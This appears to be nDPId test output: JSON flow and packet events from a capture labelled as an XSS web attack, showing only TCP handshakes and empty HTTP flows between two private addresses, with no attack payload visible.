+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347569321,"flow_last_seen":1499347569321,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347569321,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1499347569321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347569321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8g25AAD4GQmKsEAABwKgKMuTeAFCWQ7AYAAAAAKACchD+xwAAAgQFtAQCCAoBOzN2AAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5021,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":2,"flow_last_seen":1499347569321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347569321,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5N7q6xnjlkOwGaAScSDyBwAAAgQFtAQCCAoD5QTrATszdgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":3,"flow_last_seen":1499347569321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347569321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0g29AAD4GQmmsEAABwKgKMuTeAFCWQ7AZ6usZ5IAQAOWRDwAAAQEICgE7M3YD5QTr"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347570571,"flow_last_seen":1499347570571,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347570571,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1499347570571,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347570571,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l0FAAD4GLo+sEAABwKgKMuTsAFD4v6PuAAAAAKACchCnLgAAAgQFtAQCCAoBOzSvAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":2,"flow_last_seen":1499347570571,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347570571,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Ow6nDyd+L+j76AScSAmywAAAgQFtAQCCAoD5QYkATs0rwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5034,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":3,"flow_last_seen":1499347570572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347570572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0l0JAAD4GLpasEAABwKgKMuTsAFD4v6PvOpw8noAQAOXF0gAAAQEICgE7NK8D5QYk"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347573065,"flow_last_seen":1499347573065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347573065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1499347573065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347573065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8STJAAD4GfJ6sEAABwKgKMuUGAFCilH4sAAAAAKACchAgkwAAAgQFtAQCCAoBOzceAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5054,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":2,"flow_last_seen":1499347573065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347573065,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Qbzm\/YPopR+LaAScSArTgAAAgQFtAQCCAoD5QiTATs3HgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5055,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":3,"flow_last_seen":1499347573066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347573066,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0STNAAD4GfKWsEAABwKgKMuUGAFCilH4t85v2EIAQAOXKVQAAAQEICgE7Nx4D5QiT"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347574366,"flow_last_seen":1499347574366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347574366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1499347574366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347574366,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8umZAAD4GC2qsEAABwKgKMuUaAFCmeIIFAAAAAKACchAXfQAAAgQFtAQCCAoBOzhjAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":2,"flow_last_seen":1499347574366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347574366,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5RoJ5n+MpniCBqAScSCBKwAAAgQFtAQCCAoD5QnZATs4YwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5064,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":3,"flow_last_seen":1499347574367,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347574367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0umdAAD4GC3GsEAABwKgKMuUaAFCmeIIGCeZ\/jYAQAOUgMgAAAQEICgE7OGQD5QnZ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347575652,"flow_last_seen":1499347575652,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347575652,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1499347575652,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347575652,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XdZAAD4GZ\/qsEAABwKgKMuUoAFDuGWRzAAAAAKACchDsHQAAAgQFtAQCCAoBOzmlAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":2,"flow_last_seen":1499347575652,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347575652,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Sh6374H7hlkdKAScSClFgAAAgQFtAQCCAoD5QsaATs5pQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":3,"flow_last_seen":1499347575653,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347575653,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XddAAD4GaAGsEAABwKgKMuUoAFDuGWR0et++CIAQAOVEHgAAAQEICgE7OaUD5Qsa"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347445158,"flow_last_seen":1499347450735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347446419,"flow_last_seen":1499347451735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347447671,"flow_last_seen":1499347452736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57292,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347450180,"flow_last_seen":1499347455736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347451427,"flow_last_seen":1499347456736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347576923,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5092,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347578164,"flow_last_seen":1499347578164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347578164,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5092,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1499347578164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347578164,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86A1AAD4G3cKsEAABwKgKMuVCAFCbVdQUAAAAAKACchDMsgAAAgQFtAQCCAoBOzwZAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5093,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":2,"flow_last_seen":1499347578164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347578164,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5UJIGXyrm1XUFaAScSD3WQAAAgQFtAQCCAoD5Q2OATs8GQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":3,"flow_last_seen":1499347578165,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347578165,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06A5AAD4G3cmsEAABwKgKMuVCAFCbVdQVSBl8rIAQAOWWYQAAAQEICgE7PBkD5Q2O"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347579405,"flow_last_seen":1499347579405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347579405,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 